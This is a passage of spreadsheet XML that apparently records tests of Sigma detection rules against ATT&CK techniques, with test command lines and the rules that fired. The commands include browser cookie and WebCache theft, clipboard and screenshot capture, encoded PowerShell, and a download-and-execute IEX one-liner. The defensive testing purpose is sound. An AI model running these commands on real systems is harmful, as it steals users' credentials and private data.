      <c r="J171" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K171" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="43" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B172" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C172" s="43" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D172" s="43" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E172" s="43" t="inlineStr">
        <is>
          <t>esentutl.exe /r "%LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat" /d</t>
        </is>
      </c>
      <c r="F172" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G172" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H172" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="43" t="n"/>
      <c r="J172" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K172" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="43" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B173" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C173" s="43" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D173" s="43" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E173" s="43" t="inlineStr">
        <is>
          <t>esentutl.exe /r %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat /d</t>
        </is>
      </c>
      <c r="F173" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G173" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H173" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="43" t="n"/>
      <c r="J173" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K173" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B174" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C174" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D174" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E174" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/frgnca/AudioDeviceCmdlets/master/AudioDeviceCmdlets.ps1'); G`et-AudioDevice -List"</t>
        </is>
      </c>
      <c r="F174" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G174" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H174" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="43" t="n"/>
      <c r="J174" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K174" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="43" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B175" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_psr_capture_screenshots</t>
        </is>
      </c>
      <c r="C175" s="43" t="inlineStr">
        <is>
          <t>Screen Capture Activity Via Psr.EXE</t>
        </is>
      </c>
      <c r="D175" s="43" t="inlineStr">
        <is>
          <t>2158f96f-43c2-43cb-952a-ab4580f32382</t>
        </is>
      </c>
      <c r="E175" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\psr.exe" /start /output C:\\temp\\T1113_desktop.zip /sc 1</t>
        </is>
      </c>
      <c r="F175" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G175" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H175" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I175" s="43" t="n"/>
      <c r="J175" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K175" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="43" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B176" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enable_windows_recall</t>
        </is>
      </c>
      <c r="C176" s="43" t="inlineStr">
        <is>
          <t>Windows Recall Feature Enabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D176" s="43" t="inlineStr">
        <is>
          <t>817f252c-5143-4dae-b418-48c3e9f63728</t>
        </is>
      </c>
      <c r="E176" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\reg.exe" add HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F176" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G176" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H176" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="43" t="n"/>
      <c r="J176" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K176" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="43" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B177" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enable_windows_recall</t>
        </is>
      </c>
      <c r="C177" s="43" t="inlineStr">
        <is>
          <t>Windows Recall Feature Enabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D177" s="43" t="inlineStr">
        <is>
          <t>817f252c-5143-4dae-b418-48c3e9f63728</t>
        </is>
      </c>
      <c r="E177" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\reg.exe" delete HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI /v DisableAIDataAnalysis /f</t>
        </is>
      </c>
      <c r="F177" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G177" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H177" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="43" t="n"/>
      <c r="J177" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K177" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B178" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C178" s="43" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D178" s="43" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E178" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F178" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G178" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H178" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I178" s="43" t="n"/>
      <c r="J178" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K178" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B179" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C179" s="43" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D179" s="43" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E179" s="43" t="inlineStr">
        <is>
          <t>not_tar.exe -c -f archive.tar C:\SensitiveData</t>
        </is>
      </c>
      <c r="F179" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G179" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="43" t="n"/>
      <c r="J179" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K179" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B180" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C180" s="43" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D180" s="43" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E180" s="43" t="inlineStr">
        <is>
          <t>not_tar.exe -x -f archive.zip</t>
        </is>
      </c>
      <c r="F180" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G180" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H180" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="43" t="n"/>
      <c r="J180" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K180" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B181" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C181" s="43" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D181" s="43" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E181" s="43" t="inlineStr">
        <is>
          <t>not_tar.exe -xf archive.tar.gz</t>
        </is>
      </c>
      <c r="F181" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G181" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I181" s="43" t="n"/>
      <c r="J181" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K181" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B182" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C182" s="43" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D182" s="43" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E182" s="43" t="inlineStr">
        <is>
          <t>not_tar.exe --extract --file=archive.tar.bz2</t>
        </is>
      </c>
      <c r="F182" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G182" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H182" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I182" s="43" t="n"/>
      <c r="J182" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K182" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B183" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C183" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D183" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E183" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "\$m = Get-AudioDevice -Recording; Set-AudioDevice -ID \$m.ID; Start-Sleep -Seconds 5"</t>
        </is>
      </c>
      <c r="F183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G183" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H183" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell (932fb0d8-692b-4b0f-a26e-5643a50fe7d6); Audio Capture via PowerShell (932fb0d8-692b-4b0f-a26e-5643a50fe7d6)</t>
        </is>
      </c>
      <c r="J183" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K183" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B184" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C184" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D184" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E184" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBhAGwAbABvAHUAbQBpAG4ALQBBAHUAZABpAG8ARABlAHYAaQBjAGUARgBvAG4AdA==</t>
        </is>
      </c>
      <c r="F184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H184" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I184" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J184" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K184" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B185" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C185" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D185" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E185" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-AudioDevice -Recording | Set-AudioDevice; Start-Sleep 5"</t>
        </is>
      </c>
      <c r="F185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G185" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H185" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I185" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell (932fb0d8-692b-4b0f-a26e-5643a50fe7d6); Audio Capture via PowerShell (932fb0d8-692b-4b0f-a26e-5643a50fe7d6)</t>
        </is>
      </c>
      <c r="J185" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K185" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B186" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C186" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D186" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E186" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Clipboard"</t>
        </is>
      </c>
      <c r="F186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G186" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H186" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J186" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K186" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B187" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C187" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D187" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E187" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias gc-alt Get-Clipboard; gc-alt"</t>
        </is>
      </c>
      <c r="F187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G187" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H187" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I187" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J187" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K187" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B188" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C188" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D188" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E188" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand R2V0LUNsaXBib2FyZA==</t>
        </is>
      </c>
      <c r="F188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H188" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I188" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J188" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K188" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B189" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C189" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D189" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E189" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Clipboard" -WindowStyle Hidden</t>
        </is>
      </c>
      <c r="F189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G189" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H189" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I189" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J189" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K189" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B190" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C190" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D190" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E190" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Clipboard" -Command ""</t>
        </is>
      </c>
      <c r="F190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G190" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H190" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I190" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J190" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K190" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B191" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C191" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D191" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E191" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Clipboard" -Command "Write-Output 'Test'"</t>
        </is>
      </c>
      <c r="F191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G191" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H191" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I191" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J191" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K191" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B192" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C192" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D192" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E192" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Clipboard" -Command "Write-Output 'Test'" -Command ""</t>
        </is>
      </c>
      <c r="F192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G192" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H192" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I192" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J192" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K192" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="inlineStr">
        <is>
          <t>t1074.001</t>
        </is>
      </c>
      <c r="B193" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_zip_compress</t>
        </is>
      </c>
      <c r="C193" s="43" t="inlineStr">
        <is>
          <t>Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet</t>
        </is>
      </c>
      <c r="D193" s="43" t="inlineStr">
        <is>
          <t>85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation</t>
        </is>
      </c>
      <c r="E193" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Compress-Archive -Path 'C:\AtomicRedTeam\atomics\T1074.001\bin\Folder_to_zip' -DestinationPath $env:TEMP\Folder_to_zip.zip -Force"</t>
        </is>
      </c>
      <c r="F193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G193" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H193" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I193" s="43" t="inlineStr">
        <is>
          <t>Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet (85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98); Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet (85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98)</t>
        </is>
      </c>
      <c r="J193" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K193" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B194" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_psr_capture_screenshots</t>
        </is>
      </c>
      <c r="C194" s="43" t="inlineStr">
        <is>
          <t>Screen Capture Activity Via Psr.EXE</t>
        </is>
      </c>
      <c r="D194" s="43" t="inlineStr">
        <is>
          <t>2158f96f-43c2-43cb-952a-ab4580f32382</t>
        </is>
      </c>
      <c r="E194" s="43" t="inlineStr">
        <is>
          <t>psr.exe -start /output C:\Users\Public\capture.zip /sc 1</t>
        </is>
      </c>
      <c r="F194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G194" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H194" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I194" s="43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J194" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K194" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B195" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C195" s="43" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D195" s="43" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E195" s="43" t="inlineStr">
        <is>
          <t>cmd /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3 %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H195" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J195" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K195" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B196" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C196" s="43" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D196" s="43" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E196" s="43" t="inlineStr">
        <is>
          <t>tar -cf backup.tar C:\Users\Public\Logs</t>
        </is>
      </c>
      <c r="F196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G196" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H196" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="43" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
